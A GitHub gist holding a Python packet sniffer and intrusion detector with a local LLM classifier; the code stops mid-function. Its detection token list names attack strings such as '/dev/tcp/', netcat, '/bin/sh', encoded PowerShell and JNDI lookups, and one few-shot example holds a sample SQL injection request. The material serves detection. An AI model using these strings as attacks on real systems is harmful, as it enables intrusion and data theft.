Skip to content

Instantly share code, notes, and snippets.

@gary23w
Last active June 16, 2026 21:59
Show Gist options
  • Select an option

  • Save gary23w/3bbb51566a7ba1a7bbc1a7e2d384b8b6 to your computer and use it in GitHub Desktop.

Select an option

Save gary23w/3bbb51566a7ba1a7bbc1a7e2d384b8b6 to your computer and use it in GitHub Desktop.
simple-packet-sniffer.py
"""
simplepacketsniffer.py 0.5 -- single-file edition
Packet sniffer / lightweight IDS with deep protocol decoding (HTTP/DNS/TLS+JA3/
SMTP/SMB), TCP reassembly, file carving, YARA, heuristics, an ML fast-path, and
an on-device LLM analyst. The paid OpenAI dependency is replaced by a local
Qwen2.5 GGUF model (via llama-cpp-python) that auto-downloads and caches on first
run -- no API key, no network after caching.
Hybrid detection layer (see AI/ML section below):
* Heuristics + 65-feature RandomForest -> line-rate, deterministic
* Local LLM (Qwen2.5-3B) -> offline labeling + --expensive analysis (non-blocking)
On the built-in 38-sample corpus: heuristics-OR-LLM ensemble scores P/R/F1 = 1.00.
Install (gets deps incl. the llama-cpp-python CPU wheel, + Npcap on Windows):
python simplepacketsniffer.py --install
Usage examples:
Evaluate the AI layer (precision/recall on the labeled corpus; no capture):
python simplepacketsniffer.py --eval (add --no-llm to skip slow LLM rows)
Sniffer (Protection) Mode -- ML fast-path; add --enforce to apply firewall rules:
sudo python simplepacketsniffer.py --start --sentry --model-path model.pkl
Expensive Mode (local LLM analyzes every packet, off the capture thread):
sudo python simplepacketsniffer.py --start --expensive [--llm-model qwen2.5-1.5b]
Build a dataset auto-labeled by the LOCAL LLM, then train the fast-path:
sudo python simplepacketsniffer.py --build-dataset --llm-label --num-samples 200 --start
python simplepacketsniffer.py --train --dataset training_data.csv --model-path model.pkl
Block enforcement is OFF by default (alert-only). Pass --enforce to modify the
host firewall (netsh on Windows, iptables on Linux).
This file is self-contained for posting as a single gist. A logging.yaml is read
if present (the content is mirrored below); otherwise logging falls back to a
sane basic config.
***logging.yaml
version: 1
disable_existing_loggers: false
formatters:
standard:
format: '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
simple:
format: '%(asctime)s - %(levelname)s - %(message)s'
handlers:
console:
class: logging.StreamHandler
level: DEBUG
formatter: standard
stream: ext://sys.stdout
file_handler:
class: logging.handlers.RotatingFileHandler
level: DEBUG
formatter: standard
filename: sniffer.log
maxBytes: 1048576
backupCount: 3
flagged_ip_handler:
class: logging.handlers.RotatingFileHandler
level: WARNING
formatter: standard
filename: flagged_ips.log
maxBytes: 1048576
backupCount: 3
dns_handler:
class: logging.handlers.RotatingFileHandler
level: INFO
formatter: standard
filename: dns_queries.log
maxBytes: 1048576
backupCount: 3
loggers:
PacketSniffer:
level: DEBUG
handlers: [console, file_handler]
propagate: no
FlaggedIPLogger:
level: WARNING
handlers: [flagged_ip_handler, console]
propagate: no
DNSQueryLogger:
level: INFO
handlers: [dns_handler, console]
propagate: no
root:
level: DEBUG
handlers: [console]
***
"""
from __future__ import annotations
import argparse
import asyncio
import logging
import logging.config
import subprocess
import sys
import platform
import re
import ipaddress
import time
import threading
import struct
import os
import csv
import string
import gzip
import zlib
import hashlib
import binascii
import shutil
import json
import math
import queue
from dataclasses import dataclass, field
from datetime import datetime, timezone
from collections import Counter
from collections import defaultdict, deque
from typing import Tuple, Dict, Any, List, Optional
try:
import aiohttp
except ImportError:
aiohttp = None
try:
import yaml
except ImportError:
yaml = None
try:
from cachetools import TTLCache
except ImportError:
TTLCache = None
try:
import numpy as np
except ImportError:
np = None
try:
import scapy.all as scapy
from scapy.all import sniff, Ether, IP, IPv6, TCP, UDP, ICMP, ARP, Raw
from scapy.layers.dns import DNS, DNSQR
except ImportError:
scapy = None
sniff = None
Ether = None
IP = None
IPv6 = None
TCP = None
UDP = None
ICMP = None
ARP = None
Raw = None
DNS = None
DNSQR = None
try:
from scapy.layers.tls.all import TLS, TLSClientHello, TLSHandshake
except ImportError:
TLS = None
TLSClientHello = None
TLSHandshake = None
try:
from openai import AsyncOpenAI
except ImportError:
AsyncOpenAI = None
try:
from llama_cpp import Llama, LlamaGrammar # local GGUF LLM runtime
except Exception:
Llama = None
LlamaGrammar = None
try:
from huggingface_hub import hf_hub_download # auto-download + cache models
except Exception:
hf_hub_download = None
os.environ.setdefault("HF_HUB_DISABLE_SYMLINKS_WARNING", "1")
try:
from bcc import BPF
except ImportError:
BPF = None
try:
import yara
except ImportError:
yara = None
last_xdp_metadata: Optional[Dict[str, Any]] = None
# ===========================================================================
# AI / ML detection layer (local, free) -- merged in for single-file gist.
#
# Two complementary classifiers replace the original 2-feature ML model and the
# paid OpenAI calls:
# * compute_feature_vector(): 65 deterministic byte/token features for the
# line-rate RandomForest fast-path (see MLClassifier).
# * LocalLLMLabeler: a Qwen2.5 GGUF model run via llama-cpp-python that
# auto-downloads/caches on first run and emits structured JSON verdicts.
# ===========================================================================
# --- Feature extraction ---------------------------------------------------- #
ATTACK_TOKENS = [
(b"union select", "tok_union_select"), (b"select ", "tok_select"),
(b"' or ", "tok_or_inject"), (b"or 1=1", "tok_or_1eq1"),
(b"sleep(", "tok_sleep"), (b"--", "tok_sql_comment"),
(b"<script", "tok_script"), (b"onerror=", "tok_onerror"),
(b"javascript:", "tok_js_uri"), (b"../", "tok_dotdot"),
(b"..%2f", "tok_dotdot_enc"), (b"/etc/passwd", "tok_passwd"),
(b"cmd.exe", "tok_cmdexe"), (b"/bin/sh", "tok_binsh"),
(b"/bin/bash", "tok_binbash"), (b"powershell", "tok_powershell"),
(b"-enc ", "tok_ps_enc"), (b"${jndi:", "tok_jndi"),
(b"/dev/tcp/", "tok_devtcp"), (b"nc ", "tok_netcat"),
(b"<?php", "tok_php"), (b"system(", "tok_system"),
(b"eval(", "tok_eval"), (b"base64", "tok_base64"),
(b"\x90\x90\x90\x90", "tok_nopsled"), (b"eicar-standard", "tok_eicar"),
(b"sqlmap", "tok_sqlmap"), (b"nikto", "tok_nikto"),
(b"%00", "tok_nullbyte_enc"), (b";", "tok_semicolon"), (b"|", "tok_pipe"),
]
_MAGIC_FLAGS = [
(b"MZ", "magic_pe"), (b"\x7fELF", "magic_elf"), (b"%PDF-", "magic_pdf"),
(b"PK\x03\x04", "magic_zip"), (b"\xff\xd8\xff", "magic_jpeg"),
(b"\x89PNG", "magic_png"), (b"\xfeSMB", "magic_smb2"), (b"\xffSMB", "magic_smb1"),
]
_STRUCTURAL = [
"log_len", "entropy", "printable_ratio", "whitespace_ratio", "digit_ratio",
"letter_ratio", "nonascii_ratio", "null_ratio", "longest_printable_run",
"unique_byte_ratio",
]
_HIST = [f"hist_{i}" for i in range(16)]
FEATURE_NAMES: List[str] = (
_STRUCTURAL + _HIST
+ [name for _, name in ATTACK_TOKENS]
+ [name for _, name in _MAGIC_FLAGS]
)
N_FEATURES = len(FEATURE_NAMES)
def shannon_entropy(payload: bytes) -> float:
if not payload:
return 0.0
counts = Counter(payload)
total = len(payload)
return -sum((c / total) * math.log2(c / total) for c in counts.values() if c)
def _longest_printable_run(payload: bytes) -> int:
best = cur = 0
for b in payload:
if 32 <= b < 127:
cur += 1
best = max(best, cur)
else:
cur = 0
return best
def compute_feature_vector(payload: bytes) -> List[float]:
"""Return a fixed-length feature vector (len == N_FEATURES)."""
n = len(payload)
if n == 0:
return [0.0] * N_FEATURES
counts = Counter(payload)
printable = sum(counts[b] for b in range(32, 127))
whitespace = sum(counts[b] for b in (9, 10, 13, 32))
digits = sum(counts[b] for b in range(48, 58))
letters = sum(counts[b] for b in list(range(65, 91)) + list(range(97, 123)))
nonascii = sum(counts[b] for b in range(128, 256))
nulls = counts[0]
structural = [
math.log1p(n), shannon_entropy(payload), printable / n, whitespace / n,
digits / n, letters / n, nonascii / n, nulls / n,
_longest_printable_run(payload) / n, len(counts) / 256.0,
]
hist = [0.0] * 16
for b, c in counts.items():
hist[b >> 4] += c
hist = [h / n for h in hist]
low = payload.lower()
tokens = [1.0 if tok in low else 0.0 for tok, _ in ATTACK_TOKENS]
magics = [1.0 if payload[:64].find(sig) != -1 else 0.0 for sig, _ in _MAGIC_FLAGS]
return structural + hist + tokens + magics
# --- Local LLM labeler ----------------------------------------------------- #
@dataclass(frozen=True)
class ModelSpec:
key: str
repo_id: str
filename: str
note: str
MODEL_REGISTRY: Dict[str, ModelSpec] = {
"qwen2.5-3b": ModelSpec("qwen2.5-3b", "Qwen/Qwen2.5-3B-Instruct-GGUF",
"qwen2.5-3b-instruct-q4_k_m.gguf",
"Default. ~2GB. Best quality/speed balance on CPU."),
"qwen2.5-1.5b": ModelSpec("qwen2.5-1.5b", "Qwen/Qwen2.5-1.5B-Instruct-GGUF",
"qwen2.5-1.5b-instruct-q4_k_m.gguf",
"~1GB. Faster, lower accuracy."),
"qwen2.5-0.5b": ModelSpec("qwen2.5-0.5b", "Qwen/Qwen2.5-0.5B-Instruct-GGUF",
"qwen2.5-0.5b-instruct-q4_k_m.gguf",
"~0.4GB. Smoke-test / very low-resource only."),
}
DEFAULT_MODEL_KEY = "qwen2.5-3b"
CATEGORIES = [
"benign", "sqli", "xss", "command_injection", "path_traversal", "shellcode",
"malware_download", "c2_beacon", "dga", "data_exfil", "exploit",
"recon_scan", "credential_theft", "other",
]
SYSTEM_PROMPT = (
"You are a senior network-intrusion-detection analyst. You are given one "
"decoded network flow/packet and must judge it ONLY on the concrete "
"evidence shown. Output one JSON object: verdict (malicious|suspicious|"
"benign), confidence in [0,1], the single best category, and a short reason.\n"
"\n"
"DECISION RULES -- follow exactly:\n"
"1. Default to benign. Flag malicious ONLY when the decoded content itself "
"contains a concrete attack artifact (injection syntax, traversal sequence, "
"exploit string, shellcode bytes, executable magic being downloaded, etc.).\n"
"2. HIGH ENTROPY IS NORMAL. TLS/SSL handshakes and encrypted records, "
"compressed bodies (gzip), images, video, NTP and other binary protocol "
"headers are SUPPOSED to look random or contain null bytes. Never call "
"something malicious merely because entropy is high or bytes are non-text.\n"
"3. You have NO threat-intelligence feed. Do NOT claim a domain or IP is "
"'known malicious'. A DNS query to a normal-looking domain "
"(google.com, outlook.office365.com, *.cloudflare.net, cdn/update hosts) "
"is benign. Only flag a domain as DGA when the leftmost label is long "
"(>=12 chars) AND looks random/algorithmic (few vowels, mixed digits/"
"consonants) -- then it is malicious (category dga), confidence >= 0.8.\n"
"4. Authentication is not an attack. Bearer/JWT tokens, Authorization "
"headers, and login forms with username/password fields are benign unless "
"the values literally contain injection syntax (' OR 1=1, UNION SELECT, etc).\n"
"5. Apply the DGA test to EVERY DNS query, even when the format looks like a "
"'standard query'. Compute whether the leftmost label is long (>=12 chars) "
"and unpronounceable (vowel ratio < 0.3, or random digit/consonant mix). If "
"so it is malicious (dga). Do not dismiss it just because the query is "
"well-formed.\n"
"6. Attack-tooling fingerprints are malicious recon_scan (confidence >= 0.8): "
"User-Agent or content mentioning sqlmap, nikto, nmap, masscan, dirbuster, "
"gobuster, hydra, or acunetix indicates active scanning/exploitation.\n"
"7. Use 'suspicious' sparingly, only for genuinely ambiguous evidence; do "
"not use it as a hedge for normal traffic.\n"
"Respond with one JSON object only."
)
FEWSHOT = [
("Protocol: tls\nPayload entropy (0-8): 7.20\n"
"Payload (hex, first 160 chars): 16030100200100...",
'{"verdict":"benign","confidence":0.95,"category":"benign",'
'"reason":"TLS ClientHello handshake; high entropy is expected for TLS."}'),
("Protocol: dns\nPayload (text, first 400 chars):\n"
"standard query A outlook.office365.com",
'{"verdict":"benign","confidence":0.97,"category":"benign",'
'"reason":"DNS lookup of a legitimate Microsoft service domain."}'),
("Protocol: http1\nPayload (text, first 400 chars):\n"
"POST /login HTTP/1.1\\r\\nHost: shop.com\\r\\n\\r\\n"
"username=john&password=hunter2",
'{"verdict":"benign","confidence":0.93,"category":"benign",'
'"reason":"Ordinary login form post; credential fields are not injection."}'),
("Protocol: http1\nPayload (text, first 400 chars):\n"
"GET /product?id=1 UNION SELECT username,password FROM users-- HTTP/1.1",
'{"verdict":"malicious","confidence":0.98,"category":"sqli",'
'"reason":"UNION SELECT against users table is a SQL injection."}'),
("Protocol: dns\nPayload (text, first 400 chars):\n"
"standard query A kq3v9z7xj1n4plw8d2rmh.biz",
'{"verdict":"malicious","confidence":0.85,"category":"dga",'
'"reason":"Long random high-consonant label is a DGA C2 domain."}'),
("Protocol: http1\nPayload (text, first 400 chars):\n"
"GET /?id=1 HTTP/1.1\\r\\nHost: x.com\\r\\nUser-Agent: sqlmap/1.6.12",
'{"verdict":"malicious","confidence":0.9,"category":"recon_scan",'
'"reason":"sqlmap User-Agent indicates active SQL-injection scanning."}'),
]
_CATEGORY_ALIASES = {
"sql injection": "sqli", "sql_injection": "sqli", "sqli": "sqli",
"cross-site scripting": "xss", "cross site scripting": "xss", "xss": "xss",
"command injection": "command_injection", "rce": "command_injection",
"remote code execution": "command_injection", "os command injection": "command_injection",
"directory traversal": "path_traversal", "path traversal": "path_traversal",
"lfi": "path_traversal", "shellcode": "shellcode", "exploit": "exploit",
"buffer overflow": "exploit", "malware": "malware_download",
"malware download": "malware_download", "malware/pe downloads": "malware_download",
"pe download": "malware_download", "trojan": "malware_download",
"c2": "c2_beacon", "c2 beacon": "c2_beacon", "command and control": "c2_beacon",
"beacon": "c2_beacon", "dga": "dga", "domain generation algorithm": "dga",
"data exfiltration": "data_exfil", "exfiltration": "data_exfil",
"data exfil": "data_exfil", "recon": "recon_scan", "scan": "recon_scan",
"reconnaissance": "recon_scan", "port scan": "recon_scan",
"credential theft": "credential_theft", "credential": "credential_theft",
"phishing": "credential_theft", "benign": "benign", "normal": "benign",
"none": "benign", "": "benign",
}
def _normalize_category(value: str) -> str:
v = value.lower().strip()
if v in CATEGORIES:
return v
if v in _CATEGORY_ALIASES:
return _CATEGORY_ALIASES[v]
for alias, canon in _CATEGORY_ALIASES.items():
if alias and alias in v:
return canon
for canon in CATEGORIES:
if canon != "other" and canon in v:
return canon
return "other"
@dataclass
class LabelResult:
verdict: str = "benign"
confidence: float = 0.0
category: str = "benign"
reason: str = ""
label: int = 0
error: Optional[str] = None
raw: str = ""
def to_dict(self) -> Dict[str, Any]:
return {"verdict": self.verdict, "confidence": self.confidence,
"category": self.category, "reason": self.reason,
"label": self.label, "error": self.error}
class LocalLLMLabeler:
"""Lazy-loaded, thread-safe, cached local GGUF LLM classifier."""
def __init__(self, model_key: str = DEFAULT_MODEL_KEY, model_path: Optional[str] = None,
n_ctx: int = 4096, n_threads: Optional[int] = None,
suspicious_threshold: float = 0.5, cache_size: int = 4096,
use_grammar: bool = False, logger: Optional[logging.Logger] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
self.model_key = model_key
self.model_path = model_path
self.n_ctx = n_ctx
self.n_threads = n_threads or (os.cpu_count() or 4)
self.suspicious_threshold = suspicious_threshold
# GBNF grammar sampling crashes in some llama-cpp-python Windows builds;
# json_object mode is reliable, so grammar is opt-in.
self.use_grammar = use_grammar
self._llm = None
self._grammar = None
self._lock = threading.Lock()
self._cache: "Dict[str, LabelResult]" = {}
self._cache_order: list = []
self._cache_size = cache_size
self._load_error: Optional[str] = None
def resolve_model_path(self) -> str:
if self.model_path and os.path.exists(self.model_path):
return self.model_path
if hf_hub_download is None:
raise RuntimeError("huggingface_hub not installed; cannot fetch model.")
spec = MODEL_REGISTRY.get(self.model_key)
if spec is None:
raise RuntimeError(f"Unknown model key '{self.model_key}'.")
self.logger.info("Resolving local model %s (%s/%s) -- downloads & caches on first run...",
spec.key, spec.repo_id, spec.filename)
path = hf_hub_download(repo_id=spec.repo_id, filename=spec.filename)
self.logger.info("Model ready at %s", path)
return path
def _ensure_loaded(self) -> bool:
if self._llm is not None:
return True
if self._load_error is not None:
return False
if Llama is None:
self._load_error = "llama_cpp not installed"
self.logger.error("Local LLM unavailable: %s", self._load_error)
return False
try:
path = self.resolve_model_path()
self._llm = Llama(model_path=path, n_ctx=self.n_ctx,
n_threads=self.n_threads, verbose=False)
if self.use_grammar and LlamaGrammar is not None:
try:
self._grammar = LlamaGrammar.from_string(_GRAMMAR)
except Exception as exc:
self.logger.warning("Failed to compile GBNF grammar: %s", exc)
self._grammar = None
self.logger.info("Local LLM loaded (%s, %d threads, ctx=%d).",
self.model_key, self.n_threads, self.n_ctx)
return True
except Exception as exc:
self._load_error = str(exc)
self.logger.error("Failed to load local LLM: %s", exc)
return False
@property
def available(self) -> bool:
return self._ensure_loaded()
def warmup(self) -> bool:
return self._ensure_loaded()
@staticmethod
def build_context(*, summary: str = "", protocol: str = "", src: str = "", dst: str = "",
normalized_payload: str = "", hex_payload: str = "",
signatures: Optional[list] = None, entropy: Optional[float] = None,
sni: str = "", ja3: str = "", extra: str = "") -> str:
parts = []
if summary:
parts.append(f"Summary: {summary}")
if protocol:
parts.append(f"Protocol: {protocol}")
if src or dst:
parts.append(f"Flow: {src} -> {dst}")
if sni:
parts.append(f"TLS SNI: {sni}")
if ja3:
parts.append(f"JA3: {ja3}")
if entropy is not None:
parts.append(f"Payload entropy (0-8): {entropy:.2f}")
if signatures:
parts.append(f"Signature hits: {signatures}")
if normalized_payload:
parts.append(f"Payload (text, first 400 chars):\n{normalized_payload[:400]}")
if hex_payload:
parts.append(f"Payload (hex, first 160 chars): {hex_payload[:160]}")
if extra:
parts.append(extra)
return "\n".join(parts) if parts else "(empty payload)"
def _cache_key(self, context: str) -> str:
return hashlib.sha1(context.encode("utf-8", "ignore")).hexdigest()
def _cache_put(self, key: str, result: LabelResult) -> None:
if key in self._cache:
return
self._cache[key] = result
self._cache_order.append(key)
if len(self._cache_order) > self._cache_size:
self._cache.pop(self._cache_order.pop(0), None)
def classify_context(self, context: str, max_tokens: int = 160) -> LabelResult:
key = self._cache_key(context)
cached = self._cache.get(key)
if cached is not None:
return cached
if not self._ensure_loaded():
return LabelResult(error=self._load_error or "model unavailable")
messages = [{"role": "system", "content": SYSTEM_PROMPT}]
for user_ex, assistant_ex in FEWSHOT:
messages.append({"role": "user", "content": user_ex})
messages.append({"role": "assistant", "content": assistant_ex})
messages.append({"role": "user", "content": context +
'\n\nRespond as JSON: {"verdict": "...", "confidence": 0.0, '
'"category": "...", "reason": "..."}'})
try:
with self._lock:
kwargs: Dict[str, Any] = dict(messages=messages, max_tokens=max_tokens, temperature=0.0)
if self._grammar is not None:
kwargs["grammar"] = self._grammar
else:
kwargs["response_format"] = {"type": "json_object"}
out = self._llm.create_chat_completion(**kwargs)
text = out["choices"][0]["message"]["content"].strip()
except Exception as exc:
self.logger.exception("Local LLM inference error: %s", exc)
return LabelResult(error=str(exc))
result = self._parse(text)
self._cache_put(key, result)
return result
def _parse(self, text: str) -> LabelResult:
raw = text
data: Optional[Dict[str, Any]] = None
try:
data = json.loads(text)
except Exception:
start, end = text.find("{"), text.rfind("}")
if start != -1 and end != -1 and end > start:
try:
data = json.loads(text[start:end + 1])
except Exception:
data = None
if not isinstance(data, dict):
return LabelResult(error="unparseable", raw=raw)
verdict = str(data.get("verdict", "benign")).lower().strip()
if verdict not in ("malicious", "suspicious", "benign"):
verdict = "malicious" if "malic" in verdict else "benign"
try:
confidence = float(data.get("confidence", 0.0))
except Exception:
confidence = 0.0
confidence = max(0.0, min(1.0, confidence))
category = _normalize_category(str(data.get("category", "other")))
reason = str(data.get("reason", ""))[:300]
if verdict == "malicious":
label = 1
elif verdict == "suspicious":
label = 1 if confidence >= self.suspicious_threshold else 0
else:
label = 0
return LabelResult(verdict=verdict, confidence=confidence, category=category,
reason=reason, label=label, raw=raw)
def label(self, **context_kwargs) -> LabelResult:
return self.classify_context(self.build_context(**context_kwargs))
# Optional GBNF grammar (opt-in; crashes the sampler on some Windows builds).
_VERDICT_ALT = " | ".join(f'"\\"{v}\\""' for v in ("malicious", "suspicious", "benign"))
_CATEGORY_ALT = " | ".join(f'"\\"{c}\\""' for c in CATEGORIES)
_GRAMMAR = rf"""
root ::= "{{" ws "\"verdict\"" ws ":" ws verdict ws "," ws
"\"confidence\"" ws ":" ws number ws "," ws
"\"category\"" ws ":" ws category ws "," ws
"\"reason\"" ws ":" ws string ws "}}"
verdict ::= {_VERDICT_ALT}
category ::= {_CATEGORY_ALT}
number ::= ("0" ("." [0-9]+)?) | ("1" ("." "0"+)?)
string ::= "\"" char* "\""
char ::= [^"\\] | "\\" ["\\/bfnrt]
ws ::= [ \t\n]*
"""
_LLM_SINGLETON: Optional[LocalLLMLabeler] = None
_LLM_SINGLETON_LOCK = threading.Lock()
def get_labeler(model_key: str = DEFAULT_MODEL_KEY, model_path: Optional[str] = None,
logger: Optional[logging.Logger] = None, **kwargs) -> LocalLLMLabeler:
"""Process-wide singleton so the sniffer reuses one loaded model."""
global _LLM_SINGLETON
with _LLM_SINGLETON_LOCK:
if _LLM_SINGLETON is None:
_LLM_SINGLETON = LocalLLMLabeler(model_key=model_key, model_path=model_path,
logger=logger, **kwargs)
return _LLM_SINGLETON
def setup_logging(config_file: str = "logging.yaml") -> None:
try:
if hasattr(sys.stdout, "reconfigure"):
sys.stdout.reconfigure(encoding="utf-8", errors="replace")
if hasattr(sys.stderr, "reconfigure"):
sys.stderr.reconfigure(encoding="utf-8", errors="replace")
except Exception:
pass
try:
if yaml is None:
raise ImportError("PyYAML is not installed")
with open(config_file, "r") as f:
config = yaml.safe_load(f.read())
logging.config.dictConfig(config)
except Exception as e:
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(levelname)s - %(message)s"
)
logging.getLogger(__name__).warning(
"Failed to load logging config from %s, using basic config: %s",
config_file, e
)
def check_packet_capture_backend(logger: Optional[logging.Logger] = None) -> Tuple[bool, str]:
logger = logger or logging.getLogger(__name__)
if scapy is None:
return False, "Scapy is not installed. Run with --install first."
if os.name == "nt":
use_pcap = bool(getattr(scapy.conf, "use_pcap", False))
l2listen_str = str(getattr(scapy.conf, "L2listen", ""))
if (not use_pcap) or ("_NotAvailableSocket" in l2listen_str) or ("wpcap.dll missing" in l2listen_str.lower()):
return (
False,
"Npcap/WinPcap is not installed or not available. Install Npcap from https://npcap.com/ and rerun."
)
return True, ""
class AsyncRunner:
def __init__(self) -> None:
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self._run_loop, daemon=True)
self.thread.start()
def _run_loop(self) -> None:
asyncio.set_event_loop(self.loop)
self.loop.run_forever()
def run_coroutine(self, coro):
return asyncio.run_coroutine_threadsafe(coro, self.loop)
class IPLookup:
def __init__(self, ttl: int = 3600, cache_size: int = 1000, logger: Optional[logging.Logger] = None) -> None:
if TTLCache is None or aiohttp is None:
raise ImportError("IPLookup requires 'cachetools' and 'aiohttp'.")
self.cache = TTLCache(maxsize=cache_size, ttl=ttl)
self.logger = logger or logging.getLogger(__name__)
async def fetch_ip_info(self, session: aiohttp.ClientSession, ip: str) -> Dict[str, Any]:
if ip in self.cache:
return self.cache[ip]
try:
async with session.get(f"https://ipinfo.io/{ip}/json", timeout=5) as resp:
if resp.status == 200:
data = await resp.json()
self.cache[ip] = data
return data
else:
self.logger.warning("IP lookup for %s returned status %s", ip, resp.status)
except aiohttp.ClientError as e:
self.logger.exception("Network error during IP lookup for %s: %s", ip, e)
except Exception:
self.logger.exception("Unexpected error during IP lookup for %s", ip)
return {}
async def get_ip_info(self, ip: str) -> Dict[str, Any]:
async with aiohttp.ClientSession() as session:
return await self.fetch_ip_info(session, ip)
class DNSParser:
def __init__(self, logger: Optional[logging.Logger] = None, blacklist: Optional[List[str]] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
self.blacklist = set(blacklist or ['ipinfo.io', 'ipinfo.io.']) # TODO: add wildcard domains
def is_blacklisted(self, domain: str) -> bool:
return domain in self.blacklist
def parse_dns_name(self, payload: bytes, offset: int) -> Tuple[str, int]:
labels = []
while True:
if offset >= len(payload):
break
length = payload[offset]
if (length & 0xC0) == 0xC0:
if offset + 1 >= len(payload):
break
pointer = ((length & 0x3F) << 8) | payload[offset + 1]
pointed_name, _ = self.parse_dns_name(payload, pointer)
labels.append(pointed_name)
offset += 2
break
if length == 0:
offset += 1
break
offset += 1
label = payload[offset: offset + length].decode('utf-8', errors='replace')
labels.append(label)
offset += length
domain_name = ".".join(labels)
return domain_name, offset
def parse_dns_payload(self, payload: bytes) -> None:
self.logger.info("Parsing DNS payload...")
if len(payload) < 12:
self.logger.warning("DNS payload too short to parse.")
return
try:
transaction_id, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", payload[:12])
self.logger.info("DNS Header: ID=%#04x, Flags=%#04x, QD=%d, AN=%d, NS=%d, AR=%d",
transaction_id, flags, qdcount, ancount, nscount, arcount)
except Exception as e:
self.logger.exception("Error parsing DNS header: %s", e)
return
offset = 12
for i in range(qdcount):
try:
domain, offset = self.parse_dns_name(payload, offset)
if offset + 4 > len(payload):
self.logger.warning("DNS question truncated.")
break
qtype, qclass = struct.unpack("!HH", payload[offset:offset + 4])
offset += 4
self.logger.info("DNS Question %d: %s, type: %d, class: %d", i + 1, domain, qtype, qclass)
except Exception as e:
self.logger.exception("Error parsing DNS question: %s", e)
break
class PayloadParser:
def __init__(self, logger: Optional[logging.Logger] = None) -> None:
self.logger = logger or logging.getLogger(__name__)
self.SIGNATURES = {
"504B0304": "ZIP archive / Office Open XML document (DOCX, XLSX, PPTX)",
"504B030414000600": "Office Open XML (DOCX, XLSX, PPTX) extended header",
"1F8B08": "GZIP archive",
"377ABCAF271C": "7-Zip archive",
"52617221": "RAR archive",
"425A68": "BZIP2 archive",
"213C617263683E0A": "Ar (UNIX archive) / Debian package",
"7F454C46": "ELF executable (Unix/Linux)",
"4D5A": "Windows executable (EXE, MZ header / DLL)",
"CAFEBABE": "Java class file or Mach-O Fat Binary (ambiguous)",
"FEEDFACE": "Mach-O executable (32-bit, little-endian)",
"CEFAEDFE": "Mach-O executable (32-bit, big-endian)",
"FEEDFACF": "Mach-O executable (64-bit, little-endian)",
"CFFAEDFE": "Mach-O executable (64-bit, big-endian)",
"BEBAFECA": "Mach-O Fat Binary (little endian)",
"4C000000": "Windows shortcut file (.lnk)",
"4D534346": "Microsoft Cabinet file (CAB)",
"D0CF11E0": "Microsoft Office legacy format (DOC, XLS, PPT)",
"25504446": "PDF document",
"7B5C727466": "RTF document (starting with '{\\rtf')",
"3C3F786D6C": "XML file (<?xml)",
"3C68746D6C3E": "HTML file",
"252150532D41646F6265": "PostScript/EPS document (starts with '%!PS-Adobe')",
"4D2D2D2D": "PostScript file (---)",
"89504E47": "PNG image",
"47494638": "GIF image",
"FFD8FF": "JPEG image (general)",
"FFD8FFE0": "JPEG image (JFIF)",
"FFD8FFE1": "JPEG image (EXIF)",
"424D": "Bitmap image (BMP)",
"49492A00": "TIFF image (little endian / Intel)",
"4D4D002A": "TIFF image (big endian / Motorola)",
"38425053": "Adobe Photoshop document (PSD)",
"00000100": "ICO icon file",
"00000200": "CUR cursor file",
"494433": "MP3 audio (ID3 tag)",
"000001BA": "MPEG video (VCD)",
"000001B3": "MPEG video",
"66747970": "MP4/MOV file (ftyp)",
"4D546864": "MIDI file",
"464F524D": "AIFF audio file",
"52494646": "AVI file (RIFF) [Also used in WAV]",
"664C6143": "FLAC audio file",
"4F676753": "OGG container file (OggS)",
"53514C69": "SQLite database file (SQLite format 3)",
"420D0D0A": "Python compiled file (.pyc) [example magic, may vary]",
"6465780A": "Android Dalvik Executable (DEX) file",
"EDABEEDB": "RPM package file",
"786172210D0A1A0A": "XAR archive (macOS installer package)",
}
def normalize_payload(self, payload: bytes) -> str:
"""
Attempt to decode the payload as UTF-8 text and replace non-printable characters.
If decoding fails or results in gibberish, fallback to a hex representation.
"""
try:
text = payload.decode('utf-8', errors='ignore')
normalized = ''.join(ch if ch in string.printable else '.' for ch in text)
if sum(1 for ch in normalized if ch == '.') > len(normalized) * 0.5:
return payload.hex()
return normalized
except Exception:
return payload.hex()
def parse_http_payload(self, payload: bytes) -> None:
try:
text = payload.decode('utf-8', errors='replace')
text = self._make_log_safe(text)
self.logger.info("HTTP Payload:\n%s", text)
except Exception as e:
self.logger.exception("Error parsing HTTP payload: %s", e)
def parse_text_payload(self, payload: bytes) -> None:
try:
text = payload.decode('utf-8', errors='replace')
text = self._make_log_safe(text)
self.logger.info("Text Payload:\n%s", text)
except Exception as e:
self.logger.exception("Error decoding text payload: %s", e)
def parse_tls_payload(self, payload: bytes) -> None:
self.logger.info("TLS Payload (hex):\n%s", payload.hex())
def analyze_hex_dump(self, payload: bytes) -> List[Tuple[str, str]]:
head_hex = payload[:23].hex().upper()
full_hex = payload.hex().upper()
self.logger.info("Analyzing payload hex dump for signatures...")
found = []
for sig, desc in self.SIGNATURES.items():
if len(sig) <= 8:
matched = head_hex.startswith(sig)
else:
matched = head_hex.startswith(sig) or sig in full_hex
if matched:
found.append((sig, desc))
self.logger.warning("Detected signature %s: %s", sig, desc)
return found
def _make_log_safe(self, text: str) -> str:
target_encoding = getattr(sys.stdout, "encoding", None) or "utf-8"
return text.encode(target_encoding, errors="replace").decode(target_encoding, errors="replace")
@dataclass(frozen=True)
class FlowKey:
src_ip: str
src_port: int
dst_ip: str
dst_port: int
proto: str
def canonical_flow_key(src_ip: str, src_port: int, dst_ip: str, dst_port: int, proto: str = "TCP") -> Tuple[FlowKey, bool]:
left = (src_ip, src_port)
right = (dst_ip, dst_port)
if left <= right:
return FlowKey(src_ip, src_port, dst_ip, dst_port, proto), True
return FlowKey(dst_ip, dst_port, src_ip, src_port, proto), False
@dataclass
class StreamDirectionState:
base_seq: Optional[int] = None
next_seq: Optional[int] = None
contiguous: bytearray = field(default_factory=bytearray)
out_of_order: Dict[int, bytes] = field(default_factory=dict)
def add(self, seq: int, payload: bytes) -> int:
if not payload:
return 0
if self.base_seq is None:
self.base_seq = seq
self.next_seq = seq
appended = 0
if self.next_seq is None:
self.next_seq = seq
if seq < self.next_seq:
overlap = self.next_seq - seq
